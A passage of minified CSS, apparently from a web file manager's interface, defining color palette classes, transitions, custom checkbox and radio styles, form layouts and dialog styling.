or-blue-4{border-color:#7ec2f3;}.blue-5{color:#49a9ee;}.bg-blue-5{background:#49a9ee;}.bdcolor-blue-5{border-color:#49a9ee;}.blue-6{color:#108ee9;}.bg-blue-6{background:#108ee9;}.bdcolor-blue-6{border-color:#108ee9;}.blue-7{color:#0e77ca;}.bg-blue-7{background:#0e77ca;}.bdcolor-blue-7{border-color:#0e77ca;}.blue-8{color:#0c60aa;}.bg-blue-8{background:#0c60aa;}.bdcolor-blue-8{border-color:#0c60aa;}.blue-9{color:#09488a;}.bg-blue-9{background:#09488a;}.bdcolor-blue-9{border-color:#09488a;}.blue-10{color:#073069;}.bg-blue-10{background:#073069;}.bdcolor-blue-10{border-color:#073069;}.purple-1{color:#f4f3fd;}.bg-purple-1{background:#f4f3fd;}.bdcolor-purple-1{border-color:#f4f3fd;}.purple-2{color:#e4e2fa;}.bg-purple-2{background:#e4e2fa;}.bdcolor-purple-2{border-color:#e4e2fa;}.purple-3{color:#cfcaf6;}.bg-purple-3{background:#cfcaf6;}.bdcolor-purple-3{border-color:#cfcaf6;}.purple-4{color:#b3acf2;}.bg-purple-4{background:#b3acf2;}.bdcolor-purple-4{border-color:#b3acf2;}.purple-5{color:#948aec;}.bg-purple-5{background:#948aec;}.bdcolor-purple-5{border-color:#948aec;}.purple-6{color:#7265e6;}.bg-purple-6{background:#7265e6;}.bdcolor-purple-6{border-color:#7265e6;}.purple-7{color:#6252cd;}.bg-purple-7{background:#6252cd;}.bdcolor-purple-7{border-color:#6252cd;}.purple-8{color:#533eb4;}.bg-purple-8{background:#533eb4;}.bdcolor-purple-8{border-color:#533eb4;}.purple-9{color:#42299a;}.bg-purple-9{background:#42299a;}.bdcolor-purple-9{border-color:#42299a;}.purple-10{color:#321580;}.bg-purple-10{background:#321580;}.bdcolor-purple-10{border-color:#321580;}.cyan-1{color:#ebf8f9;}.bg-cyan-1{background:#ebf8f9;}.bdcolor-cyan-1{border-color:#ebf8f9;}.cyan-2{color:#cfedf0;}.bg-cyan-2{background:#cfedf0;}.bdcolor-cyan-2{border-color:#cfedf0;}.cyan-3{color:#a7dfe3;}.bg-cyan-3{background:#a7dfe3;}.bdcolor-cyan-3{border-color:#a7dfe3;}.cyan-4{color:#76cdd3;}.bg-cyan-4{background:#76cdd3;}.bdcolor-cyan-4{border-color:#76cdd3;}.cyan-5{color:#3db8c1;}.bg-cyan-5{background:#3db8c1;}.bdcolor-cyan-5{border-color:#3db8c1;}.cyan-6{color:#00a2ae;}.bg-cyan-6{background:#00a2ae;}.bdcolor-cyan-6{border-color:#00a2ae;}.cyan-7{color:#008997;}.bg-cyan-7{background:#008997;}.bdcolor-cyan-7{border-color:#008997;}.cyan-8{color:#00707f;}.bg-cyan-8{background:#00707f;}.bdcolor-cyan-8{border-color:#00707f;}.cyan-9{color:#005667;}.bg-cyan-9{background:#005667;}.bdcolor-cyan-9{border-color:#005667;}.cyan-10{color:#003c4e;}.bg-cyan-10{background:#003c4e;}.bdcolor-cyan-10{border-color:#003c4e;}.green-1{color:#ebf8f2;}.bg-green-1{background:#ebf8f2;}.bdcolor-green-1{border-color:#ebf8f2;}.green-2{color:#cfefdf;}.bg-green-2{background:#cfefdf;}.bdcolor-green-2{border-color:#cfefdf;}.green-3{color:#a7e1c4;}.bg-green-3{background:#a7e1c4;}.bdcolor-green-3{border-color:#a7e1c4;}.green-4{color:#76d0a3;}.bg-green-4{background:#76d0a3;}.bdcolor-green-4{border-color:#76d0a3;}.green-5{color:#3dbd7d;}.bg-green-5{background:#3dbd7d;}.bdcolor-green-5{border-color:#3dbd7d;}.green-6{color:#00a854;}.bg-green-6{background:#00a854;}.bdcolor-green-6{border-color:#00a854;}.green-7{color:#00924c;}.bg-green-7{background:#00924c;}.bdcolor-green-7{border-color:#00924c;}.green-8{color:#007b43;}.bg-green-8{background:#007b43;}.bdcolor-green-8{border-color:#007b43;}.green-9{color:#00643b;}.bg-green-9{background:#00643b;}.bdcolor-green-9{border-color:#00643b;}.green-10{color:#004c32;}.bg-green-10{background:#004c32;}.bdcolor-green-10{border-color:#004c32;}.pink-1{color:#feeff5;}.bg-pink-1{background:#feeff5;}.bdcolor-pink-1{border-color:#feeff5;}.pink-2{color:#fdd8e7;}.bg-pink-2{background:#fdd8e7;}.bdcolor-pink-2{border-color:#fdd8e7;}.pink-3{color:#fcb8d3;}.bg-pink-3{background:#fcb8d3;}.bdcolor-pink-3{border-color:#fcb8d3;}.pink-4{color:#fa90ba;}.bg-pink-4{background:#fa90ba;}.bdcolor-pink-4{border-color:#fa90ba;}.pink-5{color:#f7629e;}.bg-pink-5{background:#f7629e;}.bdcolor-pink-5{border-color:#f7629e;}.pink-6{color:#f5317f;}.bg-pink-6{background:#f5317f;}.bdcolor-pink-6{border-color:#f5317f;}.pink-7{color:#dc277d;}.bg-pink-7{background:#dc277d;}.bdcolor-pink-7{border-color:#dc277d;}.pink-8{color:#c11c7b;}.bg-pink-8{background:#c11c7b;}.bdcolor-pink-8{border-color:#c11c7b;}.pink-9{color:#a71278;}.bg-pink-9{background:#a71278;}.bdcolor-pink-9{border-color:#a71278;}.pink-10{color:#8c0776;}.bg-pink-10{background:#8c0776;}.bdcolor-pink-10{border-color:#8c0776;}.red-1{color:#fef0ef;}.bg-red-1{background:#fef0ef;}.bdcolor-red-1{border-color:#fef0ef;}.red-2{color:#fcdbd9;}.bg-red-2{background:#fcdbd9;}.bdcolor-red-2{border-color:#fcdbd9;}.red-3{color:#fabeb9;}.bg-red-3{background:#fabeb9;}.bdcolor-red-3{border-color:#fabeb9;}.red-4{color:#f79992;}.bg-red-4{background:#f79992;}.bdcolor-red-4{border-color:#f79992;}.red-5{color:#f46e65;}.bg-red-5{background:#f46e65;}.bdcolor-red-5{border-color:#f46e65;}.red-6{color:#f04134;}.bg-red-6{background:#f04134;}.bdcolor-red-6{border-color:#f04134;}.red-7{color:#d73435;}.bg-red-7{background:#d73435;}.bdcolor-red-7{border-color:#d73435;}.red-8{color:#bd2636;}.bg-red-8{background:#bd2636;}.bdcolor-red-8{border-color:#bd2636;}.red-9{color:#a31837;}.bg-red-9{background:#a31837;}.bdcolor-red-9{border-color:#a31837;}.red-10{color:#880a38;}.bg-red-10{background:#880a38;}.bdcolor-red-10{border-color:#880a38;}.orange-1{color:#fef3eb;}.bg-orange-1{background:#fef3eb;}.bdcolor-orange-1{border-color:#fef3eb;}.orange-2{color:#fde3cf;}.bg-orange-2{background:#fde3cf;}.bdcolor-orange-2{border-color:#fde3cf;}.orange-3{color:#fccca7;}.bg-orange-3{background:#fccca7;}.bdcolor-orange-3{border-color:#fccca7;}.orange-4{color:#faaf76;}.bg-orange-4{background:#faaf76;}.bdcolor-orange-4{border-color:#faaf76;}.orange-5{color:#f78e3d;}.bg-orange-5{background:#f78e3d;}.bdcolor-orange-5{border-color:#f78e3d;}.orange-6{color:#f56a00;}.bg-orange-6{background:#f56a00;}.bdcolor-orange-6{border-color:#f56a00;}.orange-7{color:#d75000;}.bg-orange-7{background:#d75000;}.bdcolor-orange-7{border-color:#d75000;}.orange-8{color:#b93600;}.bg-orange-8{background:#b93600;}.bdcolor-orange-8{border-color:#b93600;}.orange-9{color:#991b00;}.bg-orange-9{background:#991b00;}.bdcolor-orange-9{border-color:#991b00;}.orange-10{color:#7a0000;}.bg-orange-10{background:#7a0000;}.bdcolor-orange-10{border-color:#7a0000;}.yellow-1{color:#fffaeb;}.bg-yellow-1{background:#fffaeb;}.bdcolor-yellow-1{border-color:#fffaeb;}.yellow-2{color:#fff3cf;}.bg-yellow-2{background:#fff3cf;}.bdcolor-yellow-2{border-color:#fff3cf;}.yellow-3{color:#ffe9a7;}.bg-yellow-3{background:#ffe9a7;}.bdcolor-yellow-3{border-color:#ffe9a7;}.yellow-4{color:#ffdd76;}.bg-yellow-4{background:#ffdd76;}.bdcolor-yellow-4{border-color:#ffdd76;}.yellow-5{color:#ffce3d;}.bg-yellow-5{background:#ffce3d;}.bdcolor-yellow-5{border-color:#ffce3d;}.yellow-6{color:#ffbf00;}.bg-yellow-6{background:#ffbf00;}.bdcolor-yellow-6{border-color:#ffbf00;}.yellow-7{color:#e09a00;}.bg-yellow-7{background:#e09a00;}.bdcolor-yellow-7{border-color:#e09a00;}.yellow-8{color:#c17500;}.bg-yellow-8{background:#c17500;}.bdcolor-yellow-8{border-color:#c17500;}.yellow-9{color:#a04f00;}.bg-yellow-9{background:#a04f00;}.bdcolor-yellow-9{border-color:#a04f00;}.yellow-10{color:#802800;}.bg-yellow-10{background:#802800;}.bdcolor-yellow-10{border-color:#802800;}.grey-1{color:#fbfbfb;}.bg-grey-1{background:#fbfbfb;}.bdcolor-grey-1{border-color:#fbfbfb;}.grey-2{color:#f7f7f7;}.bg-grey-2{background:#f7f7f7;}.bdcolor-grey-2{border-color:#f7f7f7;}.grey-3{color:#f5f5f5;}.bg-grey-3{background:#f5f5f5;}.bdcolor-grey-3{border-color:#f5f5f5;}.grey-4{color:#e9e9e9;}.bg-grey-4{background:#e9e9e9;}.bdcolor-grey-4{border-color:#e9e9e9;}.grey-5{color:#d9d9d9;}.bg-grey-5{background:#d9d9d9;}.bdcolor-grey-5{border-color:#d9d9d9;}.grey-6{color:#bfbfbf;}.bg-grey-6{background:#bfbfbf;}.bdcolor-grey-6{border-color:#bfbfbf;}.grey-7{color:#919191;}.bg-grey-7{background:#919191;}.bdcolor-grey-7{border-color:#919191;}.grey-8{color:#5a5a5a;}.bg-grey-8{background:#5a5a5a;}.bdcolor-grey-8{border-color:#5a5a5a;}.grey-9{color:#404040;}.bg-grey-9{background:#404040;}.bdcolor-grey-9{border-color:#404040;}.grey-10{color:#222;}.bg-grey-10{background:#222;}.bdcolor-grey-10{border-color:#222;}.translation-fast{-webkit-transition:all 0.168s ease-in-out;-moz-transition:all 0.168s ease-in-out;-o-transition:all 0.168s ease-in-out;-ms-transition:all 0.168s ease-in-out;transition:all 0.168s ease-in-out;}.translation-nomal{-webkit-transition:all 0.25s ease-in-out;-moz-transition:all 0.25s ease-in-out;-o-transition:all 0.25s ease-in-out;-ms-transition:all 0.25s ease-in-out;transition:all 0.25s ease-in-out;}.translation-slow{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-200{-webkit-transition:all 0.2s ease-in-out;-moz-transition:all 0.2s ease-in-out;-o-transition:all 0.2s ease-in-out;-ms-transition:all 0.2s ease-in-out;transition:all 0.2s ease-in-out;}.translation-300{-webkit-transition:all 0.3s ease-in-out;-moz-transition:all 0.3s ease-in-out;-o-transition:all 0.3s ease-in-out;-ms-transition:all 0.3s ease-in-out;transition:all 0.3s ease-in-out;}.translation-500{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-1000{-webkit-transition:all 1.0s ease-in-out;-moz-transition:all 1.0s ease-in-out;-o-transition:all 1.0s ease-in-out;-ms-transition:all 1.0s ease-in-out;transition:all 1.0s ease-in-out;}.label{font-weight:400;font-size:1em;display:inline-block;}.label.label-blue-deep{background:#1b63ab;color:#fff;}.label.label-blue-nomal{background:#39f;color:#fff;}.label.label-blue-light{background:#d4e9ff;color:#39f;}.label.label-grey-deep{background:#464c5b;color:#fff;}.label.label-grey-nomal{background:#657180;color:#fff;}.label.label-grey-light{background:#9ea7b4;color:#fff;}.label.label-yellow-deep{background:#ff9900;color:#fff;}.label.label-yellow-nomal{background:#ffc267;color:#fff;}.label.label-yellow-light{background:#ffe2b6;color:#ff9900;}.label.label-green-deep{background:#068c49;color:#fff;}.label.label-green-nomal{background:#00cc66;color:#fff;}.label.label-green-light{background:#beffde;color:#068c49;}.cursor-mouse.cursor-default *{cursor:url("../../../images/common/cursor/default.png"), auto !important;}.cursor-mouse.cursor-move *{cursor:url("../../../images/common/cursor/move.png"), auto !important;}.cursor-mouse.cursor-down *{cursor:url("../../../images/common/cursor/down.png"), auto !important;}.cursor-mouse.cursor-add *{cursor:url("../../../images/common/cursor/add.png"), auto !important;}@media screen and (max-width:100000px){input[type="checkbox"].kui-checkbox-ios{ display:none !important;} input[type="checkbox"].kui-checkbox-ios +em{ vertical-align:middle;display:inline-block;margin:0 0.8em 0 0;border:1px solid #ddd;cursor:pointer;border-radius:999px;background-color:#f6f6f6;-webkit-transition:all 0.4s;-moz-transition:all 0.4s;-o-transition:all 0.4s;-ms-transition:all 0.4s;transition:all 0.4s;box-shadow:inset 0 0 0 0px rgba(0,0,0,0.4);} input[type="checkbox"].kui-checkbox-ios +em:after{ float:left;content:'';margin:1px 0 0 1px;width:18px;height:18px;border-radius:inherit;background:#ffffff;-webkit-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-moz-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-o-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-ms-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);transition:all 0.4s cubic-bezier(.54,1.85,.5,1);box-shadow:0 1px 3px rgba(0,0,0,0.4);pointer-events:none;} input[type="checkbox"].kui-checkbox-ios:checked +em{ background-color:#64bd63;border:1px solid #64bd63;} input[type="checkbox"].kui-checkbox-ios:checked +em:after{ background-color:#ffffff;box-shadow:0px 2px 5px rgba(0,0,0,0.3);} input[type="checkbox"].kui-checkbox-ios.size-smallx +em{ width:20px;height:10px;} input[type="checkbox"].kui-checkbox-ios.size-smallx +em:after{ width:8px;height:8px;} input[type="checkbox"].kui-checkbox-ios.size-smallx:checked +em:after{ margin-left:11px;} input[type="checkbox"].kui-checkbox-ios.size-small +em{ width:30px;height:15px;} input[type="checkbox"].kui-checkbox-ios.size-small +em:after{ width:13px;height:13px;} input[type="checkbox"].kui-checkbox-ios.size-small:checked +em:after{ margin-left:16px;} input[type="checkbox"].kui-checkbox-ios +em{ width:40px;height:20px;} input[type="checkbox"].kui-checkbox-ios +em:after{ width:18px;height:18px;} input[type="checkbox"].kui-checkbox-ios:checked +em:after{ margin-left:21px;} input[type="checkbox"].kui-checkbox-ios.size-big +em{ width:50px;height:25px;} input[type="checkbox"].kui-checkbox-ios.size-big +em:after{ width:23px;height:23px;} input[type="checkbox"].kui-checkbox-ios.size-big:checked +em:after{ margin-left:26px;} input[type="checkbox"].kui-checkbox-ios.size-bigx +em{ width:80px;height:40px;} input[type="checkbox"].kui-checkbox-ios.size-bigx +em:after{ width:38px;height:38px;} input[type="checkbox"].kui-checkbox-ios.size-bigx:checked +em:after{ margin-left:41px;} input[type="checkbox"].kui-checkbox-ios:checked +em{ background-color:#63acff;border:1px solid #63acff;box-shadow:inset 0 0 0 10px #63acff;} input[type="checkbox"].kui-checkbox-ios.red:checked +em{ background-color:#ff5722;border:1px solid #ff5722;box-shadow:inset 0 0 0 10px #ff5722;} input[type="checkbox"].kui-checkbox-ios.blue:checked +em{ background-color:#63acff;border:1px solid #63acff;box-shadow:inset 0 0 0 10px #63acff;} input[type="checkbox"].kui-checkbox-ios.green:checked +em{ background-color:#64bd63;border:1px solid #64bd63;box-shadow:inset 0 0 0 10px #64bd63;} input[type="checkbox"].kui-checkbox-ios.yellow:checked +em{ background-color:#ffc107;border:1px solid #ffc107;box-shadow:inset 0 0 0 10px #ffc107;} input[type="checkbox"].kui-checkbox-ios.grey:checked +em{ background-color:#aaa;border:1px solid #aaa;box-shadow:inset 0 0 0 10px #aaa;} input[type="checkbox"].kui-checkbox-ios.black:checked +em{ background-color:#444;border:1px solid #444;box-shadow:inset 0 0 0 10px #444;} input[type="checkbox"].kui-checkbox{ background:#f6f6f6;cursor:pointer;border:1px solid #ddd !important;outline:none;text-align:center;border-radius:10%;display:inline-block;background-clip:padding-box;appearance:none;-moz-appearance:none;-webkit-appearance:none;} input[type="checkbox"].kui-checkbox:before{ font-family:FontAwesome;content:"\f00c";color:#f6f6f6;} input[type="checkbox"].kui-checkbox:checked{ background:#1b7e5a;border-color:#1b7e5a !important;} input[type="checkbox"].kui-checkbox:checked:before{ color:#fff;} input[type="checkbox"].kui-checkbox:checked:hover, input[type="checkbox"].kui-checkbox:checked:focus{ box-shadow:none !important;} input[type="checkbox"].kui-checkbox:hover, input[type="checkbox"].kui-checkbox:focus{ border-color:#1b7e5a !important;box-shadow:0 0 0 1px #1b7e5a !important;} input[type="checkbox"].kui-checkbox.radius{ border-radius:999px;} input[type="checkbox"].kui-checkbox.size-smallx{ height:16px;font-size:9.6px;width:16px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-smallx:before{ line-height:16px;} input[type="checkbox"].kui-checkbox.size-small{ height:18px;font-size:10.8px;width:18px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-small:before{ line-height:18px;} input[type="checkbox"].kui-checkbox{ height:20px;font-size:12px;width:20px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox:before{ line-height:20px;} input[type="checkbox"].kui-checkbox.size-big{ height:26px;font-size:15.6px;width:26px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-big:before{ line-height:26px;} input[type="checkbox"].kui-checkbox.size-bigx{ height:32px;font-size:19.2px;width:32px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-bigx:before{ line-height:32px;} input[type="checkbox"].kui-checkbox:checked{ background:#63acff;border-color:#63acff !important;} input[type="checkbox"].kui-checkbox:hover, input[type="checkbox"].kui-checkbox:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="checkbox"].kui-checkbox.red:checked{ background:#ff5722;border-color:#ff5722 !important;} input[type="checkbox"].kui-checkbox.red:hover, input[type="checkbox"].kui-checkbox.red:focus{ border-color:#ff5722 !important;box-shadow:0 0 0 1px #ff5722 !important;} input[type="checkbox"].kui-checkbox.blue:checked{ background:#63acff;border-color:#63acff !important;} input[type="checkbox"].kui-checkbox.blue:hover, input[type="checkbox"].kui-checkbox.blue:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="checkbox"].kui-checkbox.green:checked{ background:#64bd63;border-color:#64bd63 !important;} input[type="checkbox"].kui-checkbox.green:hover, input[type="checkbox"].kui-checkbox.green:focus{ border-color:#64bd63 !important;box-shadow:0 0 0 1px #64bd63 !important;} input[type="checkbox"].kui-checkbox.yellow:checked{ background:#ffc107;border-color:#ffc107 !important;} input[type="checkbox"].kui-checkbox.yellow:hover, input[type="checkbox"].kui-checkbox.yellow:focus{ border-color:#ffc107 !important;box-shadow:0 0 0 1px #ffc107 !important;} input[type="checkbox"].kui-checkbox.grey:checked{ background:#aaa;border-color:#aaa !important;} input[type="checkbox"].kui-checkbox.grey:hover, input[type="checkbox"].kui-checkbox.grey:focus{ border-color:#aaa !important;box-shadow:0 0 0 1px #aaa !important;} input[type="checkbox"].kui-checkbox.black:checked{ background:#444;border-color:#444 !important;} input[type="checkbox"].kui-checkbox.black:hover, input[type="checkbox"].kui-checkbox.black:focus{ border-color:#444 !important;box-shadow:0 0 0 1px #444 !important;} input[type="radio"].kui-radio{ background:#f6f6f6;cursor:pointer;border:1px solid #ddd !important;outline:none;border-radius:999px;display:inline-block;text-align:center;-webkit-transition:all 0.2s ease-in-out;-moz-transition:all 0.2s ease-in-out;-o-transition:all 0.2s ease-in-out;-ms-transition:all 0.2s ease-in-out;transition:all 0.2s ease-in-out;background-clip:padding-box;box-shadow:0 1px 2px rgba(0,0,0,0.05), inset 0px -15px 10px -12px rgba(0,0,0,0.05);appearance:none;-moz-appearance:none;-webkit-appearance:none;} input[type="radio"].kui-radio:before{ font-family:FontAwesome;content:"\f00c";color:#f6f6f6;} input[type="radio"].kui-radio:checked:before{ color:#fff;} input[type="radio"].kui-radio:checked:hover, input[type="radio"].kui-radio:checked:focus{ box-shadow:none !important;} input[type="radio"].kui-radio:hover, input[type="radio"].kui-radio:focus{ border-color:#224 !important;} input[type="radio"].kui-radio.size-smallx{ font-size:9.6px;height:16px;width:16px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-smallx:before{ line-height:14px;} input[type="radio"].kui-radio.size-small{ font-size:10.8px;height:18px;width:18px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-small:before{ line-height:16px;} input[type="radio"].kui-radio{ font-size:14.4px;height:24px;width:24px !important;margin-right:0.8em;} input[type="radio"].kui-radio:before{ line-height:22px;} input[type="radio"].kui-radio.size-big{ font-size:15.6px;height:26px;width:26px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-big:before{ line-height:24px;} input[type="radio"].kui-radio.size-bigx{ font-size:19.2px;height:32px;width:32px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-bigx:before{ line-height:30px;} input[type="radio"].kui-radio:checked{ background:#63acff;border-color:#63acff !important;} input[type="radio"].kui-radio:hover, input[type="radio"].kui-radio:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="radio"].kui-radio.red:checked{ background:#ff5722;border-color:#ff5722 !important;} input[type="radio"].kui-radio.red:hover, input[type="radio"].kui-radio.red:focus{ border-color:#ff5722 !important;box-shadow:0 0 0 1px #ff5722 !important;} input[type="radio"].kui-radio.blue:checked{ background:#63acff;border-color:#63acff !important;} input[type="radio"].kui-radio.blue:hover, input[type="radio"].kui-radio.blue:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="radio"].kui-radio.green:checked{ background:#64bd63;border-color:#64bd63 !important;} input[type="radio"].kui-radio.green:hover, input[type="radio"].kui-radio.green:focus{ border-color:#64bd63 !important;box-shadow:0 0 0 1px #64bd63 !important;} input[type="radio"].kui-radio.yellow:checked{ background:#ffc107;border-color:#ffc107 !important;} input[type="radio"].kui-radio.yellow:hover, input[type="radio"].kui-radio.yellow:focus{ border-color:#ffc107 !important;box-shadow:0 0 0 1px #ffc107 !important;} input[type="radio"].kui-radio.grey:checked{ background:#aaa;border-color:#aaa !important;} input[type="radio"].kui-radio.grey:hover, input[type="radio"].kui-radio.grey:focus{ border-color:#aaa !important;box-shadow:0 0 0 1px #aaa !important;} input[type="radio"].kui-radio.black:checked{ background:#444;border-color:#444 !important;} input[type="radio"].kui-radio.black:hover, input[type="radio"].kui-radio.black:focus{ border-color:#444 !important;box-shadow:0 0 0 1px #444 !important;}}.form-box{color:#444;}.form-box a{color:#5d9cec;text-decoration:none;}.form-box a:hover{color:#4a89dc;}.form-box .panel-body{position:relative;}.form-box .panel-body .line,.form-box .panel-body hr{border:none;height:1px;overflow:hidden;background:#ddd;margin:10px 30px;height:2px;background:transparent url("../../../images/common/line.png") repeat-x 0 0;}.form-box .panel-body h1,.form-box .panel-body h2,.form-box .panel-body h3,.form-box .panel-body h4,.form-box .panel-body h5{margin:0.6em 1em 0.5em 30px;padding-bottom:0.4em;border-bottom:1px solid #ddd;}.form-box.config-box .form-header{height:40px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#efefef', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-o-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);-pie-background:linear-gradient(to 60deg,#efefef 0%,#f5f7fa 100%);border-bottom:1px solid #ddd;}.form-box.config-box .form-header .modal-title{height:40px;line-height:40px;padding-left:30px;font-size:14px;}.form-box.config-box .form-header .modal-title img,.form-box.config-box .form-header .modal-title .x-item-file{height:26px;width:26px;line-height:26px;text-align:center;border-radius:15%;display:inline-block;margin-right:10px;padding:0;color:#fff;position:relative;top:8px;}.form-box.config-box .form-header .modal-title img.x-font-icon,.form-box.config-box .form-header .modal-title .x-item-file.x-font-icon{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to 164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));}.form-box.config-box .form-header .modal-title img.font-icon-words,.form-box.config-box .form-header .modal-title .x-item-file.font-icon-words{font-size:10px;}.form-box.config-box .form-header .modal-title i{font-style:normal;}.form-box.config-box .form-header .modal-title img,.form-box.config-box .form-header .modal-title .x-font-icon{top:0px;}.form-box.config-box .panel-body{overflow:auto;border-radius:4px;padding:20px 0;position:absolute;left:0;right:0;top:42px;bottom:71px;margin:0;border:none;background:#fff;}.form-box .form-row{padding:3px 30px;padding-right:5px;width:auto;margin:1px 0;}.form-box .form-row:after{clear:both;}.form-box .form-row.form-group{margin:0;}.form-box .form-row label{margin-right:10px;display:inline;}.form-box .form-row input[type='radio']{display:inline-block;margin-right:10px;}.form-box .form-row input[type='text'],.form-box .form-row input[type='password'],.form-box .form-row input[type='number']{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;display:inline-block;height:28px;width:260px;color:#444;border-radius:4px;padding-left:0.5em;margin-right:10px;}.form-box .form-row input[type='text']:focus,.form-box .form-row input[type='password']:focus,.form-box .form-row input[type='number']:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.form-box .form-row input[type='text']:focus,.form-box .form-row input[type='password']:focus,.form-box .form-row input[type='number']:focus{box-shadow:0 0 0 3px rgba(117,161,240,0.33);}.form-box .form-row select{min-width:268px;}.form-box .form-row textarea{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;width:251px;height:100px;margin-right:10px;border-radius:2px;padding:8px;transition:none;}.form-box .form-row textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.form-box .form-row textarea:focus{box-shadow:0 0 0 3px rgba(117,161,240,0.33);}.form-box .form-row .setting-title{height:30px;line-height:30px;width:140px;margin-right:20px;padding-top:5px;padding-left:5px;float:left;position:relative;text-align:right;}.form-box .form-row .setting-title .require{color:#ff5722;font-size:20px;position:absolute;margin-top:4px;padding:0 0 0 5px;}.form-box .form-row .setting-content{float:left;position:relative;width:70%;padding:5px;border-radius:4px;border:1px solid transparent;}.form-box .form-row .setting-content input.has-btn-right{width:220px;padding-right:40px;}.form-box .form-row .setting-content .input-btn-right{padding:0;margin-left:-50px;position:absolute;width:35px;height:30px;line-height:30px;border-radius:0 4px 4px 0;}.form-box .form-row .setting-content .input-btn-right .font-icon{font-size:14px;width:20px;padding:0 !important;}.form-box .form-row .setting-content input.has-btn-right:focus + .input-btn-right{border-color:#75a1f0;border-left-color:#c7d5ef;}.form-box .form-row .font-icon{padding:0;}.form-box .form-row .user-select{margin:0.5em 0;}.form-box .form-row.form-userSelect .setting-content{background:#f8fcff;padding:10px 5px;margin-top:-5px;}.form-box .form-row.form-userSelect .desc{margin-top:10px;}.form-box .form-row.error .setting-content{background:#ffefed;border-color:#ffb3ae;}.form-box .form-row.form-color .color-picker-view i{width:20px;height:20px;margin-top:5px;box-shadow:0 0 4px #666;display:inline-block;border-radius:2px;}.form-box .form-row .select2-container{width:270px !important;}.form-box .form-row .slider.slider-horizontal{width:260px;margin-right:20px;height:30px;}.form-box .form-row .slider .tooltip{pointer-events:none;}.form-box .form-row .desc,.form-box .form-row .setting-content i{color:#9ba3af;font-style:normal;}.form-box .ztree.group-list-tree a{border:none;padding-left:3px;}.form-box .ztree.group-list-tree a:hover{border:none;}.form-box .ztree.group-list-tree li a.curSelectedNode{color:#fff;}.form-box .ztree.group-list-tree .sub-menu{float:right;display:none;line-height:20px;padding-right:7px;font-size:1.15em;color:#ddd;}.form-box .ztree.group-list-tree .hover .sub-menu{display:inline-block;color:#666;}.form-box .ztree.group-list-tree .curSelectedNode .sub-menu,.form-box .ztree.group-list-tree .hover.curSelectedNode .sub-menu{display:inline-block;color:#fff;}.form-box-title-left .form-row .setting-title{text-align:left;}body .colorpicker{z-index:99999;}body .dialog-plugin-config.dialog-no-title .aui-outer{box-shadow:0 6px 40px 0 rgba(16,17,18,0.3);border:1px solid #ccc !important;border-radius:4px;overflow:hidden;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close{color:#bbb;color:rgba(0,0,0,0.2);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:active,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:active,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:active{background:rgba(0,0,0,0.12);}body 